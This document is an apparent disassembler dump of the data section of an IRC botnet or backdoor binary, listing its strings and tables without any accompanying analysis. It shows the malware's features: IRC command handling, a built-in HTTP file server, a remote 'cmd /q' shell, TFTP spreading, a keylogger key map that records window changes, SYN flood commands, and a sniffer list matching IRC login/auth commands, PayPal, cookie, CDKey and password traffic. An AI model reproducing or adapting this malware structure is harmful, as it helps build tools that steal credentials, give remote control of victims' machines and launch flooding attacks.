aDddDdMmmYyyy db 'ddd, dd MMM yyyy',0 ; DATA XREF: sub_40FFE9+84�o
align 4
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_40FFE9+98�o
align 4
; char aHttp1_0200OkSe[]
aHttp1_0200OkSe db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FFE9+D4�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char aHttp1_0200Ok_0[]
aHttp1_0200Ok_0 db 'HTTP/1.0 200 OK',0Dh,0Ah ; DATA XREF: sub_40FFE9+F7�o
db 'Server: myBot',0Dh,0Ah
db 'Cache-Control: no-cache,no-store,max-age=0',0Dh,0Ah
db 'pragma: no-cache',0Dh,0Ah
db 'Content-Type: %s',0Dh,0Ah
db 'Content-Length: %i',0Dh,0Ah
db 'Accept-Ranges: bytes',0Dh,0Ah
db 'Date: %s %s GMT',0Dh,0Ah
db 'Last-Modified: %s %s GMT',0Dh,0Ah
db 'Expires: %s %s GMT',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aS_25 db '\%s',0 ; DATA XREF: sub_41016C+2F�o
; char aS_26[]
aS_26 db '%s',0 ; DATA XREF: sub_41016C+3A�o
align 4
; char aSS_4[]
aSS_4 db '%s%s',0 ; DATA XREF: sub_41016C+EA�o
align 10h
; char asc_44BA30[]
asc_44BA30: ; DATA XREF: sub_41016C+FB�o
dw 0Ah
unicode 0, <>,0
; char asc_44BA34[]
asc_44BA34: ; DATA XREF: sub_41016C+15A�o
unicode 0, <*>,0
; char asc_44BA38[]
asc_44BA38 db '-' ; DATA XREF: sub_41016C+212�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aWorkerThreadOf db ' worker thread of server thread: %d.',0
align 4
; char asc_44BA6C[]
asc_44BA6C db '-' ; DATA XREF: sub_41016C+296�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_39 db ' failed to start worker thread, error %d',0
align 4
; char asc_44BAA4[]
asc_44BAA4 db 0Ah,0 ; DATA XREF: sub_410423+29�o
align 4
; char aPrivmsgSSearch[]
aPrivmsgSSearch db 'PRIVMSG %s :Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_410423+4B�o
; char aHtmlHeadTitleI[]
aHtmlHeadTitleI db '<HTML>',0Dh,0Ah ; DATA XREF: sub_410423+79�o
db '<HEAD>',0Dh,0Ah
db '<TITLE>Index of %s</TITLE>',0Dh,0Ah
db '</HEAD>',0Dh,0Ah
db '<BODY>',0Dh,0Ah,0
align 4
; char aH1IndexOfSH1Ta[]
aH1IndexOfSH1Ta db '<H1>Index of %s</H1>',0Dh,0Ah ; DATA XREF: sub_410423+AE�o
db '<TABLE BORDER="0">',0Dh,0Ah,0
align 4
; char aTrTdWidthDCode[]
aTrTdWidthDCode db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+F9�o
db '<TD WIDTH="%d"><CODE>Name</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aTrTdColspan3Hr[]
aTrTdColspan3Hr db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+12D�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char aSearchingForS[]
aSearchingForS db 'Searching for: %s',0Dh,0Ah,0 ; DATA XREF: sub_410423+149�o
; char aTrTdColspan3AH[]
aTrTdColspan3AH db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+1C5�o
db '<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></T'
db 'D>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 4
; char a__[]
a__ db '..',0 ; DATA XREF: sub_410423+237�o
align 4
; char a__2[]
a__2: ; DATA XREF: sub_410423+252�o
unicode 0, <.>,0
aPm_0 db 'PM',0 ; DATA XREF: sub_410423+28A�o
align 10h
aAm db 'AM',0 ; DATA XREF: sub_410423+295�o
align 4
; char a2_2d2_2d4d2_2d[]
a2_2d2_2d4d2_2d db '%2.2d/%2.2d/%4d %2.2d:%2.2d %s',0 ; DATA XREF: sub_410423+2BF�o
; char aS_27[]
aS_27 db '<%s>',0 ; DATA XREF: sub_410423+2E9�o
align 4
aPrivmsgS31s21s db 'PRIVMSG %s :%-31s %-21s',0Ah,0 ; DATA XREF: sub_410423+310�o
align 4
; char aTrTdWidthDAHre[]
aTrTdWidthDAHre db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+328�o
db '<TD WIDTH="%d"><A HREF="',0
align 4
; char aSS_5[]
aSS_5 db '%s%s/',0 ; DATA XREF: sub_410423+36C�o
align 10h
aCode_29sGtCode db '"><CODE>%.29s>/</CODE></A>',0 ; DATA XREF: sub_410423+3B3�o
align 10h
; char aCodeSCodeA[]
aCodeSCodeA db '"><CODE>%s/</CODE></A>',0 ; DATA XREF: sub_410423:loc_4107DD�o
align 4
aTdTdWidthDCode db '</TD>',0Dh,0Ah ; DATA XREF: sub_410423+3F9�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
align 10h
; char aS_28[]
aS_28 db '<%s>',0 ; DATA XREF: sub_410423+40B�o
align 4
; char a31s21s[]
a31s21s db '%-31s %-21s',0Dh,0Ah,0 ; DATA XREF: sub_410423+42F�o
align 4
; char aPrivmsgS31s2_0[]
aPrivmsgS31s2_0 db 'PRIVMSG %s :%-31s %-21s (%s bytes)',0Ah,0 ; DATA XREF: sub_410423+46E�o
align 10h
; char aTrTdWidthDAH_0[]
aTrTdWidthDAH_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+496�o
db '<TD WIDTH="%d"><A HREF="',0
align 10h
; char aSS_6[]
aSS_6 db '%s%s',0 ; DATA XREF: sub_410423+4DA�o
align 4
aCode_30sGtCode db '"><CODE>%.30s></CODE></A>',0 ; DATA XREF: sub_410423+521�o
align 4
; char aCodeSCodeA_0[]
aCodeSCodeA_0 db '"><CODE>%s</CODE></A>',0 ; DATA XREF: sub_410423:loc_41094B�o
align 10h
aTdTdWidthDCo_0 db '</TD>',0Dh,0Ah ; DATA XREF: sub_410423+571�o
db '<TD WIDTH="%d"><CODE>%s</CODE></TD>',0Dh,0Ah
db '<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah,0
; char a31s21sIBytes[]
a31s21sIBytes db '%-31s %-21s (%i bytes)',0Dh,0Ah,0 ; DATA XREF: sub_410423+58D�o
align 4
; char aPrivmsgSFoundS[]
aPrivmsgSFoundS db 'PRIVMSG %s :Found %s Files and %s Directories',0Ah,0
; DATA XREF: sub_410423+61C�o
align 4
; char aTrTdColspan3_0[]
aTrTdColspan3_0 db '<TR>',0Dh,0Ah ; DATA XREF: sub_410423+637�o
db '<TD COLSPAN="3"><HR></TD>',0Dh,0Ah
db '</TR>',0Dh,0Ah
db '</TABLE>',0Dh,0Ah
db '</BODY>',0Dh,0Ah
db '</HTML>',0Dh,0Ah,0
align 4
; char aFoundIFilesAnd[]
aFoundIFilesAnd db 'Found: %i Files and %i Directories',0Dh,0Ah,0
; DATA XREF: sub_410423+652�o
align 4
; char aSSHttp1_1Refer[]
aSSHttp1_1Refer db '%s %s HTTP/1.1',0Ah ; DATA XREF: sub_410B94+8F�o
db 'Referer: %s',0Ah
db 'Host: %s',0Ah
db 'Connection: close',0Ah
db 0Ah,0
; char asc_44BF7C[]
asc_44BF7C db '-' ; DATA XREF: sub_410CB5+BB�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aClientConnecti db '- client connection from %s:%d.',0
; char aUseridUnixS[]
aUseridUnixS db ' : USERID : UNIX : %s',0Dh,0Ah,0 ; DATA XREF: sub_410CB5+116�o
; char asc_44BFC0[]
asc_44BFC0 db '-' ; DATA XREF: sub_410CB5+171�o
db 3, 34h, 2
dd 6E656469h, 3026474h
aServerFailed_0 db '- server failed, returned %d',0
align 4
; char asc_44BFEC[]
asc_44BFEC db '-' ; DATA XREF: sub_410E63+E9�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aClientConnec_0 db 'Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char asc_44C034[]
asc_44C034 db '-' ; DATA XREF: sub_410E63+15E�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 2
db 3, 2Dh, 20h
aFailedToSta_40 db 'Failed to start client thread, error: <%d>.',0
; char asc_44C070[]
asc_44C070 db '-' ; DATA XREF: sub_410FF4+E1�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aClientConnec_1 db 'Client connection to IP: %s:%d, Server thread: %d.',0
align 4
; char asc_44C0B4[]
asc_44C0B4 db '-' ; DATA XREF: sub_410FF4+1AA�o
db 3, 34h, 2
db 72h ; r
db 65h, 64h, 69h
db 72h ; r
db 65h, 63h, 74h
db 3
db 2, 2Dh, 20h
aFailedToSta_41 db 'Failed to start connection thread, error: <%d>.',0
; char asc_44C0F4[]
asc_44C0F4 db '-' ; DATA XREF: sub_411278+E1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorGetpeerna db '- Error: getpeername(): <%d>.',0
align 10h
aPermissionDeni db 'Permission denied',0Ah,0 ; DATA XREF: sub_411278+172�o
align 4
; char asc_44C134[]
asc_44C134 db '-' ; DATA XREF: sub_411278+1A2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedInS@ db '- User logged in: <%s@%s>.',0
; char asc_44C15C[]
asc_44C15C db '-' ; DATA XREF: sub_411278+1C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorSessionru db '- Error: SessionRun(): <%d>.',0
align 4
; char asc_44C188[]
asc_44C188 db '-' ; DATA XREF: sub_411278+1E9�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aUserLoggedOutS db '- User logged out: <%s@%s>.',0
align 4
; char asc_44C1B4[]
asc_44C1B4 db '-' ; DATA XREF: sub_41147D:loc_4114C2�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aProtocolString db '- Protocol string too long.',0
align 10h
; char dword_44C1E0[]
dword_44C1E0 dd 234032Dh, 676F6C72h, 2646E69h, 4C202D03h, 6E69676Fh
; DATA XREF: sub_4114D7+1B�o
dd 6A657220h, 65746365h, 52202C64h, 746F6D65h, 73752065h
dd 203A7265h, 4073253Ch, 2E3E7325h, 0
db 2Dh ; -
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aLoginRejectedR db '- Login rejected, Remote user: <%s@%s>.',0
align 10h
; char asc_44C250[]
asc_44C250 db '-' ; DATA XREF: sub_411506+3D�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorWsastartu db '- Error: WSAStartup(): <%d>.',0
align 4
; char asc_44C27C[]
asc_44C27C db '-' ; DATA XREF: sub_411506+70�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToInstal db '- Failed to install control-C handler, error: <%d>.',0
align 10h
unk_44C2C0 db 2Dh ; - ; DATA XREF: sub_411506+106�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aReadyAndWaitin db '- Ready and waiting for incoming connections.',0
align 4
; char asc_44C2FC[]
asc_44C2FC db '-' ; DATA XREF: sub_411506+177�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aClientConnec_2 db '- Client connection from IP: %s:%d, Server thread: %d.',0
; char asc_44C340[]
asc_44C340 db '-' ; DATA XREF: sub_411506+1FB�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToSta_42 db '- Failed to start client thread, error: <%d>.',0
align 4
; char asc_44C37C[]
asc_44C37C db '-' ; DATA XREF: sub_411506+219�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
; char asc_44C3B4[]
asc_44C3B4 db '-' ; DATA XREF: sub_41178E+59�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
; char asc_44C3FC[]
asc_44C3FC db '-' ; DATA XREF: sub_41178E+8B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
; char asc_44C444[]
asc_44C444 db '-' ; DATA XREF: sub_41178E+DE�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 4
unk_44C478 db 2Dh ; - ; DATA XREF: sub_4118DF+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
; char asc_44C4B8[]
asc_44C4B8 db '-' ; DATA XREF: sub_4118DF+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_2 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 4
unk_44C4F8 db 2Dh ; - ; DATA XREF: sub_4118DF+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_4119D8+8C�o
align 4
; char asc_44C528[]
asc_44C528 db '-' ; DATA XREF: sub_4119D8+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 10h
; char asc_44C560[]
asc_44C560 db '-' ; DATA XREF: sub_411AB1+A1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
; char asc_44C59C[]
asc_44C59C db '-' ; DATA XREF: sub_411C86+A8�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_5 db '- Server started on: %s:%d.',0
; char asc_44C5C4[]
asc_44C5C4 db '-' ; DATA XREF: sub_411C86+114�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 4
; char asc_44C608[]
asc_44C608 db '-' ; DATA XREF: sub_411C86+18F�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_43 db '- Failed to start client thread, error: <%d>.',0
align 4
; char asc_44C644[]
asc_44C644 db '-' ; DATA XREF: sub_411C86+1B2�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_44 db '- Failed to start server on Port %d.',0
align 4
; char dword_44C678[]
dword_44C678 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E8B+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 4
; char dword_44C6B8[]
dword_44C6B8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E8B+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 4
; char dword_44C6F8[]
dword_44C6F8 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E8B+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
aOctet db 'octet',0
align 4
; char aRb_0[]
aRb_0 db 'rb',0 ; DATA XREF: sub_41224F+130�o
align 4
; char aTftpTransferSt[]
aTftpTransferSt db 'Tftp transfer started to: %s',0 ; DATA XREF: sub_41224F+2CD�o
align 4
; char aTftpTransferCo[]
aTftpTransferCo db 'Tftp transfer complete to: %s',0 ; DATA XREF: sub_41224F+3C4�o
align 4
dword_44C788 dd 4000500h, 7868746Bh, 2 dup(0) ; DATA XREF: sub_41224F+41C�o
dd 8
dword_44C79C dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_4127AD:loc_412890�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_44CECC dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_4127AD+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
; char asc_44CF04[]
asc_44CF04 db '\',0 ; DATA XREF: sub_4126CC+2C�o
align 4
; char aAb[]
aAb db 'ab',0 ; DATA XREF: sub_4126CC+4E�o
align 4
; char aDDDDDDS[]
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_4126CC+88�o
align 4
; char asc_44CF28[]
asc_44CF28 db '-' ; DATA XREF: sub_4126CC+AE�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh, 7325202Dh, 0
; char aSChangedWindow[]
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_4127AD+8F�o
align 4
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_4127AD+1E5�o
align 10h
; char aSReturnS[]
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_4127AD+228�o
align 8
off_44CF88 dd offset dword_44D7F0 ; DATA XREF: sub_412A8E+2B9�r
dd offset dword_44D7F4
dd offset dword_44D7F8
dd offset aHttp_0 ; "HTTP"
; char a_login[]
a_login db ':.login',0 ; DATA XREF: sub_412A8E+1DE�o
dd 3 dup(0)
dword_44CFAC dd 0 ; DATA XREF: sub_412A8E+2B2�r
aLogin_3 db ':,login',0
dd 4 dup(0)
aLogin_4 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_5 db ':$login',0
dd 4 dup(0)
aLogin_6 db ':%login',0
dd 4 dup(0)
aLogin_7 db ':^login',0
dd 4 dup(0)
aLogin_8 db ':&login',0
dd 4 dup(0)
aLogin_9 db ':*login',0
dd 4 dup(0)
aLogin_10 db ':-login',0
dd 4 dup(0)
aLogin_11 db ':+login',0
dd 4 dup(0)
aLogin_12 db ':/login',0
dd 4 dup(0)
aLogin_13 db ':\login',0
dd 4 dup(0)
aLogin_14 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_15 db ':',27h,'login',0
dd 4 dup(0)
aLogin_16 db ':`login',0
dd 4 dup(0)
aLogin_17 db ':~login',0
dd 4 dup(0)
aLogin_18 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 4
dd 4 dup(0)
aAuth db ':,auth',0
align 10h
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 4
dd 4 dup(0)
a@auth db ':@auth',0
align 10h
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 4
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 10h
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 4
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 10h
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 4
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 10h
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 4
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 10h
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 4
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 10h
dd 4 dup(0)
a?auth db ':?auth',0
align 4
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 10h
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 4
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 10h
dd 4 dup(0)
aAuth_14 db ': auth',0
align 4
dd 4 dup(0)
a_id db ':.id',0
align 10h
dd 4 dup(0)
aId_0 db ':,id',0
align 4
dd 4 dup(0)
aId_1 db ':!id',0
align 10h
dd 4 dup(0)
a@id db ':@id',0
align 4
dd 4 dup(0)
aId_2 db ':$id',0
align 10h
dd 4 dup(0)
aId_3 db ':%id',0
align 4
dd 4 dup(0)
aId_4 db ':^id',0
align 10h
dd 4 dup(0)
aId_5 db ':&id',0
align 4
dd 4 dup(0)
aId_6 db ':*id',0
align 10h
dd 4 dup(0)
aId_7 db ':-id',0
align 4
dd 4 dup(0)
aId_8 db ':+id',0
align 10h
dd 4 dup(0)
aId_9 db ':/id',0
align 4
dd 4 dup(0)
aId_10 db ':\id',0
align 10h
dd 4 dup(0)
aId_11 db ':=id',0
align 4
dd 4 dup(0)
a?id db ':?id',0
align 10h
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 4
dd 4 dup(0)
aId_13 db ':`id',0
align 10h
dd 4 dup(0)
aId_14 db ':~id',0
align 4
dd 4 dup(0)
aId_15 db ': id',0
align 10h
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 4
dd 3 dup(0)
aHashin_0 db ':!hashin',0
align 10h
aHashin_1 db ':$hashin',0
align 4
dd 3 dup(0)
aHashin_2 db ':%hashin',0
align 10h
a_secure db ':.secure',0
align 4
dd 3 dup(0)
aSecure_2 db ':!secure',0
align 10h
a_l db ':.l',0
dd 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 4
dd 4 dup(0)
aSyn_2 db ':!syn',0
align 10h
dd 4 dup(0)
aSyn_3 db ':$syn',0
align 4
dd 4 dup(0)
aSyn_4 db ':%syn',0
align 10h
dd 4 dup(0)
aCdkey db ' CDKey ',0
dd 4 dup(0)
aJoin_2 db 'JOIN #',0
align 10h
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
dword_44D7F0 dd 544F42h ; DATA XREF: .data:off_44CF88�o
